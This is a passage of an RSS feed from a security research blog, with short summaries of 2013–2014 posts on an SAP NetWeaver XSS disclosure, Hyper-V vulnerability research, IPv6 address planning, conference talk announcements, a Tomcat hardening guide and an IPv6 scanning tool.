      <link>https://insinuator.net/2014/01/xss-in-sap-netweaver/</link>
      <pubDate>Fri, 24 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/xss-in-sap-netweaver/</guid>
      <description>&lt;p&gt;We just got &lt;a href=&#34;http://scn.sap.com/docs/DOC-8218&#34; title=&#34;Acknowledgments to Security Researchers&#34;&gt;credits&lt;/a&gt; for a flaw we found in SAP Netweaver. The issue is a reflected &lt;a href=&#34;https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_%28XSS%29&#34; title=&#34;OWASP Top 10 - XSS&#34;&gt;Cross-Site Scripting&lt;/a&gt; (XSS). It can be triggered in the administrative interface for the Internet Communication Manager (ICM) and Web Dispatcher. This means that the targets for this XSS will definitely be users with administrative privileges. This makes it especially juicy for an attacker.&lt;/p&gt;&#xA;&lt;p&gt;SAP rated the vulnerability with CVSS and a Base Score of 4.3 having a Base Vector of &lt;code&gt;AV:N/AC:M/AU:N/C:N/I:P/A:N&lt;/code&gt;. Which again opens the discussion on how to rate the impact of XSS by using CVSS. CVSS &lt;a href=&#34;http://www.first.org/cvss/cvss-guide#i3.1.1&#34; title=&#34;CVSS rating XSS&#34;&gt;states&lt;/a&gt; that XSS “&lt;em&gt;should be scored with no impact to confidentiality or availability, and partial impact to integrity&lt;/em&gt;“, which is clearly arguable. Especially when thinking of the impact on confidentiality. As you might know by now, we tried to tackle the problem of rating vulnerabilities ourselves with the &lt;a href=&#34;http://www.insinuator.net/2013/10/isse-2013-ernw-rapid-rating-system/&#34; title=&#34;ERRS&#34;&gt;ERNW Rapid Rating System&lt;/a&gt; (ERRS) and it was not an easy task. 😉 However, SAP states that this is a correction with high priority, so you should apply the patches as soon as possible.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Address Plan Considerations, Part 2: The “PI Space from (Single|Multiple) RIR(s) Debate”</title>
      <link>https://insinuator.net/2014/01/ipv6-address-plan-considerations-part-2-the-pi-space-from-singlemultiple-rirs-debate/</link>
      <pubDate>Thu, 23 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/ipv6-address-plan-considerations-part-2-the-pi-space-from-singlemultiple-rirs-debate/</guid>
      <description>&lt;p&gt;This is the second part of the – presumably – three-part series on IPv6 address planning which I started &lt;a href=&#34;http://www.insinuator.net/2014/01/ipv6-address-plan-considerations-part-1-general-guidelines/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Before an enterprise organization (strictly speaking “their internal service provider acting as LIR”, as laid out in the first part) starts assigning prefix[es]/lengths to their networks usually another discussion has to be undertaken &amp;amp; solved: “go with one /32 [PI space] from one RIR or apply for /32s from several RIRs”.&lt;/p&gt;</description>
    </item>
    <item>
      <title>More Troopers Talks Selected</title>
      <link>https://insinuator.net/2014/01/more-troopers-talks-selected/</link>
      <pubDate>Sat, 18 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/more-troopers-talks-selected/</guid>
      <description>&lt;p&gt;Today we have to pleasure to announce another round of &lt;a href=&#34;https://www.troopers.de/&#34;&gt;Troopers&lt;/a&gt; talks.&lt;br&gt;&#xA;Here we go:&lt;/p&gt;&#xA;&lt;p&gt; &lt;br&gt;&#xA;Noam Liram: Vulnerability Classification in the SaaS Era      &lt;strong&gt;FIRST TIME MATERIAL&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Abstract: In this talk we will thoroughly analyze two major SaaS vulnerabilities that were found by Adallom (one of which is still in responsible disclosure stages at the time of writing). By demonstrating this new class of exploits which we have nick-named “Ice Dagger” attacks, we aim to change the current industry-wide criteria for vulnerability classifications, which were developed in the Desktop/Server world, are inadequate when classifying SaaS vulnerabilities. We will specifically discuss the details of MS13-104.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Serial Port Debugging Between two Virtual Machines in VMware Fusion</title>
      <link>https://insinuator.net/2014/01/serial-port-debugging-between-two-virtual-machines-in-vmware-fusion/</link>
      <pubDate>Thu, 16 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/serial-port-debugging-between-two-virtual-machines-in-vmware-fusion/</guid>
      <description>&lt;p&gt;In the course of our virtualization research, we came across a certain technical issue we couldn’t find an easy solution on knowledge bases and the like. However, as we found the question several times on the web, the following post gives just a short hint on a technical detail.&lt;/p&gt;&#xA;&lt;p&gt;If you want to connect two virtual machines in VMware Fusion using a serial port (e.g. for debugging purposes), Fusion doesn’t provide you an GUI option to configure that. However, if you just add the following config to the debugger system’s VMX file:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Exploiting Hyper-V: How We Discovered MS13-092</title>
      <link>https://insinuator.net/2014/01/exploiting-hyper-v-how-we-discovered-ms13-092/</link>
      <pubDate>Tue, 14 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/exploiting-hyper-v-how-we-discovered-ms13-092/</guid>
      <description>&lt;p&gt;During a recent research project we performed an in-depth security assessment of Microsoft’s virtualization technologies, including Hyper-V and Azure. While we already had experience in discovering security vulnerabilities in other virtual environments (e.g. &lt;a href=&#34;http://www.insinuator.net/2012/05/vmdk-has-left-the-building/&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2011/07/the-key-to-your-datacenter/&#34;&gt;here&lt;/a&gt;), this was our first research project on the Microsoft virtualization stack and we took care to use a &lt;a href=&#34;http://www.insinuator.net/2013/05/analysis-of-hypervisor-breakouts/&#34;&gt;structured evaluation strategy&lt;/a&gt; to cover all potential attack vectors.&lt;br&gt;&#xA;Part of our research concentrated on the Hyper-V hypervisor itself and we discovered a critical vulnerability which can be exploited by an unprivileged virtual machine to crash the hypervisor and potentially compromise other virtual machines on the same physical host. This bug was recently patched, see &lt;a href=&#34;https://technet.microsoft.com/en-us/security/bulletin/ms13-092&#34;&gt;MS13-092&lt;/a&gt; and our &lt;a href=&#34;http://www.insinuator.net/2014/01/state-of-virtualization-security-14/&#34;&gt;corresponding post&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Tomcat 7 Hardening Guide</title>
      <link>https://insinuator.net/2014/01/tomcat-7-hardening-guide/</link>
      <pubDate>Sat, 11 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/tomcat-7-hardening-guide/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;continuing our tradition from last year (see &lt;a href=&#34;http://www.insinuator.net/2013/08/sles-11-hardening-guide/&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2013/07/basic-os-x-hardening-dma/&#34;&gt;here&lt;/a&gt;), we summarized more of our hardening recommendations for you. This guide is covering Tomcat 7 and is supposed to provide a solid base of hardening measures. It includes configuration examples and all necessary commands for each control, specifically for the most recent branch of Tomcat as there were some significant changes. Download: &lt;a href=&#34;https://www.ernw.de/download/hardening/ERNW_Checklist_Tomcat7_Hardening.pdf&#34;&gt;ERNW_Checklist_Tomcat7_Hardening.pdf&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Have a good one,&lt;/p&gt;&#xA;&lt;p&gt;Matthias&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Address Plan Considerations, Part 1: General Guidelines</title>
      <link>https://insinuator.net/2014/01/ipv6-address-plan-considerations-part-1-general-guidelines/</link>
      <pubDate>Fri, 10 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/ipv6-address-plan-considerations-part-1-general-guidelines/</guid>
      <description>&lt;p&gt;In an upcoming series of blog posts I will discuss some principles &amp;amp; considerations on developing an IPv6 address plan. In (hopefully) rather quick succession there will be three posts:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;the first  on some general rules as for IPv6 address planning which we regard instrumental in the process.&lt;/li&gt;&#xA;&lt;li&gt;the second covering the “PI space from a single RIR or PI space from each (relevant, as for $ORG) RIR?” debate.&lt;/li&gt;&#xA;&lt;li&gt;the third on actual approaches to structuring/grouping each region’s /32 (or /36) into subdivisions like sites, VRFs, facilities, use types, buildings, whatever. I understand that this part is probably the one quite some readers are most interested in; still for a reasonable line of thought the others have to be covered in advance.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;As you might have already spotted from the prefix lengths mentioned above, the presumed setting (read: the main audience) of this piece is a sufficiently large enterprise organization with sites/subsidiaries/plants all over the globe, potentially mainly in the EMEA, APAC and Americas regions. So if you’re [with] a service provider organization, a university or small[er] organization, some of the recommendations I lay out might not apply to you. This focus (or restriction thereof) is for the simple reason of ignorance. Given I haven’t been involved in many address planning efforts in such organizations I don’t feel qualified to advance opinions on their settings.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some notes on 30C3</title>
      <link>https://insinuator.net/2014/01/some-notes-on-30c3/</link>
      <pubDate>Wed, 08 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/some-notes-on-30c3/</guid>
      <description>&lt;p&gt;We wish you a happy new year and a good start to 2014. A new year has begun and, just before that, 30C3 took place. I think almost all of you have heard about the congress and its topics. In particukar there was Glenn Greenwald’s &lt;a href=&#34;https://events.ccc.de/congress/2013/Fahrplan/events/5622.html&#34;&gt;keynote&lt;/a&gt; or there were new &lt;a href=&#34;https://events.ccc.de/congress/2013/Fahrplan/events/5713.html&#34;&gt;publications/revelations&lt;/a&gt; by Jacob Appelbaum, which you will probably have heard about from main media.&lt;br&gt;&#xA;But besides of all that, there were really a lot of other interesting talks we want to give you a short introduction to. Overall it was a really good conference this year and a lot of awesome talks. But, like always, it is not possible to see all of them, so here is a short summary of some of our favorites:&lt;/p&gt;</description>
    </item>
    <item>
      <title>State of Virtualization Security ‘14</title>
      <link>https://insinuator.net/2014/01/state-of-virtualization-security-14/</link>
      <pubDate>Sun, 05 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/state-of-virtualization-security-14/</guid>
      <description>&lt;p&gt;First of all, I hope you all had a good start to 2014. Having some time off “between the years” (which is a German saying for the time between Christmas and NYE), I caught up on several virtualization security topics.&lt;/p&gt;&#xA;&lt;p&gt;While virtualization is widely accepted as a sufficiently secure technology in many areas of IT operations (also for sensitive applications or exposed systems, like &lt;a href=&#34;http://www.insinuator.net/2009/12/some-reflections-on-virtualization-security-part-1/&#34;&gt;DMZs&lt;/a&gt;) by 2014, there are several recent vulnerabilities and incidents that are worth mentioning.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 2014 – Third Round of Talks Selected</title>
      <link>https://insinuator.net/2014/01/troopers-2014-third-round-of-talks-selected/</link>
      <pubDate>Fri, 03 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/troopers-2014-third-round-of-talks-selected/</guid>
      <description>&lt;p&gt;At first a very happy new year to all our readers!&lt;/p&gt;&#xA;&lt;p&gt;Today we announce the third round of Troopers 2014 talks (first round &lt;a href=&#34;http://www.insinuator.net/2013/11/troopers-2014-first-round-of-talks-selected/&#34;&gt;here&lt;/a&gt;, second &lt;a href=&#34;http://www.insinuator.net/2013/12/troopers-2014-second-round-of-talks-selected/&#34;&gt;here&lt;/a&gt;).&lt;/p&gt;&#xA;&lt;p&gt;Here we go:&lt;/p&gt;&#xA;&lt;p&gt;===&lt;/p&gt;&#xA;&lt;p&gt;Daniel Mende: Implementing an USB Host Driver Fuzzer         &lt;strong&gt;FIRST TIME MATERIAL&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Abstract: The Universal Serial Bus (USB) can be found everywhere these days, may it be to connect a mouse or keyboard to the computer, transfer data on a flash drive connected via USB or to attach some additional hardware like a Digital Video Broadcast receiver. Some of these devices use a standardized device class which are served by an operating system default driver while other, special purpose devices, do not fit into any of those classes, so vendors ship their own drivers. As every vendor specific USB driver installed on a system adds additional attack surface, there needs to be some method to evaluate the stability and the security of those vendor proprietary drivers. The simplest way to perform a stability analysis of closed source products is the fuzzing approach. As there have been no publicly available tools for performing USB host driver fuzzing, I decided to develop one ;-), building on Sergey’s and Travis’ legendary &lt;a href=&#34;https://www.troopers.de/wp-content/uploads/2012/12/TROOPERS13-You_wouldnt_share_a_syringe_Would_you_share_a_USB_port-Sergey_Bratus+Travis_Goodspeed.pdf&#34;&gt;Troopers13 talk&lt;/a&gt;. Be prepared to learn a lot about USB specifics, and to see quite a number of blue screens and stack traces on major server operating systems…&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 2014 – Second Round of Talks Selected</title>
      <link>https://insinuator.net/2013/12/troopers-2014-second-round-of-talks-selected/</link>
      <pubDate>Wed, 18 Dec 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/12/troopers-2014-second-round-of-talks-selected/</guid>
      <description>&lt;p&gt;We’re very happy to announce the second round of Troopers 2014 talks today (first round &lt;a href=&#34;http://www.insinuator.net/2013/11/troopers-2014-first-round-of-talks-selected/&#34;&gt;here&lt;/a&gt;).&lt;br&gt;&#xA;Some (well, actually most 😉 ) of these talks haven’t been presented before, at any other occasion, so this is exciting fresh material which was/is prepared especially for &lt;a href=&#34;https://www.troopers.de&#34;&gt;Troopers&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Andreas Wiegenstein &amp;amp; Xu Jia: Risks in Hosted SAP Environments.&lt;/strong&gt; &lt;strong&gt;FIRST TIME MATERIAL&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;**Synopsis: **Many SAP customers have outsourced the operation of their SAP systems in order to save cost. In doing so, they entrust their most critical data to a hosting provider, potentially sharing the same SAP server with a number of companies and organizations unknown to them. These companies and organizations virtually sit in the same boat, without knowing each other and without trusting each other. They all trust in the ability of their hosting provider to run their operating environment in a secure way, though.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW Newsletter 42: Dangers of Disabled Pre-Boot Authentication in  Corporate Environments</title>
      <link>https://insinuator.net/2013/12/ernw-newsletter-42-dangers-of-disabled-pre-boot-authentication-in-corporate-environments/</link>
      <pubDate>Mon, 16 Dec 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/12/ernw-newsletter-42-dangers-of-disabled-pre-boot-authentication-in-corporate-environments/</guid>
      <description>&lt;p&gt;It’s been a long time… we just published an &lt;a href=&#34;https://www.ernw.de/category/newsletter/index.html&#34;&gt;ERNW Newsletter&lt;/a&gt;. Here’s the abstract:&lt;/p&gt;&#xA;&lt;p&gt;In order to protect sensitive data on corporate laptops, most companies are using full disk encryption solutions. While native encryption products like Microsoft Bitlocker, Apple FileVault and open source solutions like TrueCrypt were already heavily scrutinized by security researchers, many popular commercial third party products are to some point still black boxes.&lt;/p&gt;&#xA;&lt;p&gt;In this paper, we discuss Check Point Full Disk Encryption (FDE) with active “Windows Integrated Logon”. Checkpoint FDE is a software package that is part of Check Point Endpoint Security and offers full disk encryption on Microsoft  Windows and Mac OS X systems. The “Windows Integrated Logon” feature reduces total cost of ownership by disabling pre-boot authentication. Check Point themselves warn about security risk associated with using this feature.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Design &amp; Configuration of IPv6 Segments with High Security Requirements</title>
      <link>https://insinuator.net/2013/12/design-configuration-of-ipv6-segments-with-high-security-requirements/</link>
      <pubDate>Fri, 13 Dec 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/12/design-configuration-of-ipv6-segments-with-high-security-requirements/</guid>
      <description>&lt;p&gt;Such was the title of a talk I gave yesterday at &lt;a href=&#34;http://www.acsac.org/&#34;&gt;ACSAC 29&lt;/a&gt;. It was an updated and shortened version of a similar talk I had given at the &lt;a href=&#34;https://www.troopers.de/&#34;&gt;Troopers&lt;/a&gt; IPv6 Security Summit (btw: &lt;a href=&#34;https://www.troopers.de/troopers14/troopers14-ipv6-security-summit-2014/index.html&#34;&gt;this&lt;/a&gt; is the preliminary agenda of the 2014 event).&lt;/p&gt;&#xA;&lt;p&gt;The slides of the ACSAC talk can be found &lt;a href=&#34;https://www.ernw.de/download/ERNW_ACSAC_IPv6_High_Secure_Networks.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;have a great weekend everybody&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>ACSAC 2013</title>
      <link>https://insinuator.net/2013/12/acsac-2013/</link>
      <pubDate>Thu, 12 Dec 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/12/acsac-2013/</guid>
      <description>&lt;p&gt;Matthias and I currently have to pleasure to be at &lt;a href=&#34;http://www.acsac.org/&#34;&gt;ACSAC&lt;/a&gt;, in New Orleans.&lt;br&gt;&#xA;From my perspective, at ACSAC the usual conference visit side-effect of personal interaction with peers plays an even larger role than at many other events. In fact we met a number of people we hadn’t seen for quite some time and I could even clear a long unresolved debt (Hi Pastor! and thanks for those &lt;a href=&#34;https://archive.org/details/International_Journal_of_PoC_2013_08_05&#34;&gt;International Journal of PoC&lt;/a&gt; issues).&lt;/p&gt;</description>
    </item>
    <item>
      <title>DeepSec 2013</title>
      <link>https://insinuator.net/2013/12/deepsec-2013/</link>
      <pubDate>Mon, 09 Dec 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/12/deepsec-2013/</guid>
      <description>&lt;p&gt;Last week Florian and I participated at this year’s DeepSec in Vienna. We had a really good time, thanks again to the DeepSec staff for a nice conference. Although it might be a bit late, I want to share some impressions about various talks I enjoyed.&lt;/p&gt;&#xA;&lt;p&gt;## spin: Static Instrumentation For Binary Reverse-Engineering&lt;/p&gt;&#xA;&lt;p&gt;This talk primarily covered a technique called &lt;em&gt;binary instrumentation&lt;/em&gt;, which is used e.g. for performance evaluation, CPU emulation, tracing and profiling but also for malware- and threat-analysis. David Guillen Fandos proposed the application of this technique in the field of reverse engineering. Binary instrumentation is a technique which allows to modify and rewrite binaries during their execution by injecting instructions into the original code (pretty much like virtual machines do too). Therefore one could easily wrap instructions with logging/tracing functions, to observe the execution status before and after easy instruction step (and/or dump the output into a file). For the purpose of reversing, one could also create complex conditional breakpoints (retaining status across executions), which makes it possible to characterize functions.&lt;/p&gt;</description>
    </item>
    <item>
      <title>3D-Printers in the Cloud</title>
      <link>https://insinuator.net/2013/11/3d-printers-in-the-cloud/</link>
      <pubDate>Wed, 27 Nov 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/11/3d-printers-in-the-cloud/</guid>
      <description>&lt;p&gt;&lt;strong&gt;Dear readers,&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;with the rise of low-cost 3D-printers in the homes of thousands [1] of enthusiastic tinkerers the word spreads about these magical machines which can produce any mechanical, artsy, useful or useless parts you might come up with. Standing in living rooms worldwide, they don’t seem like a big threat [2] to anybody. But what happens if you connect them to the Internet?&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2013/11/TROOPERS_3Dprinters.jpg&#34; alt=&#34;3D-Printers at the TROOPERS12 &amp;amp; TROOPERS13 IT-Security Conference.&#34;&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Medical Device Security</title>
      <link>https://insinuator.net/2013/11/medical-device-security/</link>
      <pubDate>Thu, 21 Nov 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/11/medical-device-security/</guid>
      <description>&lt;p&gt;One of our guiding principles at ERNW is “Make the World a Safer Place”. There could not be a topic that matches this principle more than the security or insecurity of medical devices. This is why we started a research project that is looking at how vulnerable those devices are that might be deployed in hospitals around the world. Recently the U.S. Food and Drug Administration (FDA) has put out a &lt;a href=&#34;http://www.fda.gov/medicaldevices/safety/alertsandnotices/ucm356423.htm&#34; title=&#34;FDA recommendation&#34;&gt;recommendation&lt;/a&gt; concerning the security of medical devices. It recommends that “manufacturers and health care facilities take steps to assure that appropriate safeguards are in place to reduce the risk of failure due to cyberattack, which could be initiated by the introduction of malware into the medical equipment or unauthorized access to configuration settings in medical devices and hospital networks”. We thought that we should take a look at how manufacturers deal with security for these devices.&lt;/p&gt;</description>
    </item>
    <item>
      <title>t2’13 Infosec Conference</title>
      <link>https://insinuator.net/2013/11/t213-infosec-conference/</link>
      <pubDate>Sun, 17 Nov 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/11/t213-infosec-conference/</guid>
      <description>&lt;p&gt;Hey everybody,&lt;/p&gt;&#xA;&lt;p&gt;I am little bit late to the party, but I had the pleasure to present a talk about VoIP based toll fraud incidents (more on this in a following blogpost, for the moment my slides can be found &lt;a href=&#34;https://www.ernw.de/download/T2_VoIP_TollFraud_cwerny_v1.0.pdf&#34;&gt;here&lt;/a&gt;) at the annual &lt;a href=&#34;http://t2.fi/&#34;&gt;t2 security conference&lt;/a&gt; in Helsinki. The conference took place from 24th to 25th October in the Radisson Blu Royal hotel. I must say that it was a blast. Tomi (the host) took really good care of all speakers, and I really liked the spirit of the conference, very similar to &lt;a href=&#34;https://www.troopers.de&#34;&gt;Troopers&lt;/a&gt;. It is not an commercial event, seats are limited to 100 and it is all about delivering a &lt;a href=&#34;http://t2.fi/schedule/2013/&#34;&gt;great set of talks&lt;/a&gt; to the audience and having a good time during and after the conference. Sure the conference has some sponsors and tickets are sold, but Tomi doesn’t do it to earn money. His only intention is to cover the cost for setting up this great event.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 2014 – First Round of Talks Selected</title>
      <link>https://insinuator.net/2013/11/troopers-2014-first-round-of-talks-selected/</link>
      <pubDate>Sat, 16 Nov 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/11/troopers-2014-first-round-of-talks-selected/</guid>
      <description>&lt;p&gt;We’re delighted to provide the first announcement of talks of next year’s &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; edition. Looks like it’s going to be a great event again 😉&lt;br&gt;&#xA;Here we go:&lt;/p&gt;&#xA;&lt;p&gt;==================&lt;/p&gt;&#xA;&lt;p&gt;Toby Kohlenberg: Granular Trust – Making it Work&lt;/p&gt;&#xA;&lt;p&gt;Over the last 5 years the concept of using dynamic or granular trust models to control access to systems, networks and applications has become well known and is now seeing partial adoption in many places. The challenge is how granular and dynamic can you get and the question is whether it is worth it. As the architect of Intel’s trust model Toby can speak to the entire journey from initial idea through current implementation and the likely road ahead. This talk will include the good, bad and ugly parts of designing a trust model and then implementing it in a Fortune 50 company’s production environment. You will learn from his mistakes so you can make different ones.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Scanner</title>
      <link>https://insinuator.net/2013/11/ipv6-scanner/</link>
      <pubDate>Sat, 09 Nov 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/11/ipv6-scanner/</guid>
      <description>&lt;p&gt;This is a guest post from Antonios Atlasis.&lt;/p&gt;&#xA;&lt;p&gt;===&lt;/p&gt;&#xA;&lt;p&gt;Having just finished the second &lt;a href=&#34;https://www.ernw.de/wp-content/uploads/M44b-Advanced_Attack_Techniques-06_11_2013_Heidelberg.pdf&#34;&gt;“Advanced Attack Techniques against IPv6 Networks” workshop&lt;/a&gt; (some of the course material can be found &lt;a href=&#34;http://www.insinuator.net/2013/06/slides-scripts-from-antonios-atlasis-advanced-attack-techniques-against-ipv6-networks-workshop/&#34;&gt;here&lt;/a&gt;), organised and hosted by ERNW and their partner &lt;a href=&#34;http://hmtrainingsolutions.com/en.html&#34;&gt;HM Training Solutions&lt;/a&gt;, I would like to take this opportunity to release publicly one of my scripting tools, an IPv6 scanner. This tool is based on Scapy (so you have to install Scapy and its prerequisites before using it). It should not be considered as a replacement or a competitor of nmap against IPv6 or of the scanners incorporated into the great IPv6 toolkits already released by &lt;a href=&#34;https://www.thc.org/thc-ipv6/&#34;&gt;Marc Heuse&lt;/a&gt; and &lt;a href=&#34;http://www.si6networks.com/tools/ipv6toolkit/index.html&#34;&gt;Fernando Gont&lt;/a&gt;, but, instead, as a tool released mainly for educational purposes. Specifically, this scanner, apart from supporting some of the most well known port scanning techniques, from ping scanning to SYN, RESET, ACK, XMAS, etc., etc., TCP or UDP scanning, it also combines, by using the suitable switches, some IDS/IPS evasion techniques. As I have found out up to now, at least two of them, if used “properly”, can be effective against a very popular IDS/IPS software used by many “Fortune 100” companies out there. This means that you can launch actually any type of the supported network-scanning techniques while flying under the radar of this specific IDS software (and perhaps some other too, who knows…). But first of all, as always please check the corresponding README file.&lt;/p&gt;</description>
    </item>
    <item>
      <title>pytacle – alpha2</title>
      <link>https://insinuator.net/2013/10/pytacle-alpha2/</link>
      <pubDate>Wed, 30 Oct 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/10/pytacle-alpha2/</guid>
      <description>&lt;p&gt;Its been a long time, since i released the last version of pytacle, but now the time has come. Here is alpha2 with some new features:&lt;/p&gt;&#xA;&lt;p&gt;– Support of RTLSDR sticks&lt;br&gt;&#xA;– Possibility to scan for cells around you&lt;br&gt;&#xA;– Changed the code to generate real KCs (but as nobody noticed the wrong KCs i guess you were good with the others 😉&lt;/p&gt;&#xA;&lt;p&gt;Im also planning to address hopping channels in the future, but ive not made it far enough in my DSP lecture, yet 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>ISSE 2013 – ERNW Rapid Rating System</title>
      <link>https://insinuator.net/2013/10/isse-2013-ernw-rapid-rating-system/</link>
      <pubDate>Mon, 28 Oct 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/10/isse-2013-ernw-rapid-rating-system/</guid>
      <description>&lt;p&gt;Michael Thumann and me had the chance to give a talk at this year’s &lt;a href=&#34;http://www.isse.eu.com/&#34; title=&#34;ISSE&#34;&gt;ISSE&lt;/a&gt; conference in Brussels, Belgium. ISSE was founded in 1999 as an initiative of the European Commission Directorate General Information Society. The con had a focus on eGovernment, electronic business processes and the corresponding security issues.&lt;/p&gt;&#xA;&lt;p&gt;We talked about the ERRS, the &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-presentations/&#34; title=&#34;here&#34;&gt;ERNW Rapid Rating System&lt;/a&gt;, that can be used to perform a vulnerability rating for findings that result from different kinds of sources. Audits and Pentests will find a vast amount of vulnerabilities in the infrastructure. To deal with these vulnerabilities, you have to use some kind of prioritization in order to use resources effectively. We tried to adopt the strengths from metrics like CVSS and developed our own set of parameters to calculate the metric, focussing on the relevant customer questions concerning vulnerabilities from all kinds of sources.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPAM Requirements in IPv6 Networks</title>
      <link>https://insinuator.net/2013/10/ipam-requirements-in-ipv6-networks/</link>
      <pubDate>Thu, 24 Oct 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/10/ipam-requirements-in-ipv6-networks/</guid>
      <description>&lt;p&gt;I recently had a discussion with some practitioners about requirements to IP Address Management (IPAM) solutions which are specific for IPv6 networks. We came up with the following:&lt;/p&gt;&#xA;&lt;p&gt;Mandatory: Track all dynamic IPv6 assignments (SLAAC + PrivExtensions, DHCP etc.), by polling neighbor caches from network devices. Support SNMPv3 for this task.&lt;br&gt;&#xA;Optional (read: nice-to-have): support other methods than SNMP to gather this info (e.g. SSH-ing into devices and execution of appropriate “show” commands).&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Impact of Pervasive Monitoring on Corporate InfoSec</title>
      <link>https://insinuator.net/2013/10/the-impact-of-pervasive-monitoring-on-corporate-infosec/</link>
      <pubDate>Wed, 23 Oct 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/10/the-impact-of-pervasive-monitoring-on-corporate-infosec/</guid>
      <description>&lt;p&gt;A few weeks ago I gave a presentation with the above title at some corporate infosec event. Given I’ve been asked for the slides many times now, I’ve converted them to a PDF which can be found &lt;a href=&#34;https://www.ernw.de/download/ERNW_Pervasive_Monitoring_Corporate_InfoSec_web.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;We hope to contribute to the necessary debate thereby…&lt;/p&gt;&#xA;&lt;p&gt;Have a good one,&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>DayCon VII</title>
      <link>https://insinuator.net/2013/09/daycon-vii/</link>
      <pubDate>Thu, 26 Sep 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/09/daycon-vii/</guid>
      <description>&lt;p&gt;Some of us had the pleasure to participate in this year’s &lt;a href=&#34;http://www.day-con.org&#34;&gt;Daycon VII&lt;/a&gt;, three days of Real Hacking and Relevant Content, in Dayton, OH. The event began on September 16th with the Packetwars bootcamp. We had the chance to teach some really promising young students and to prepare them for the Packetwars battle that was scheduled four days later. The students had to go through topics like Windows security, network security and web application security both practical and in theory.&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackRF – A Must-Have Gadget</title>
      <link>https://insinuator.net/2013/08/hackrf-a-must-have-gadget/</link>
      <pubDate>Mon, 26 Aug 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/08/hackrf-a-must-have-gadget/</guid>
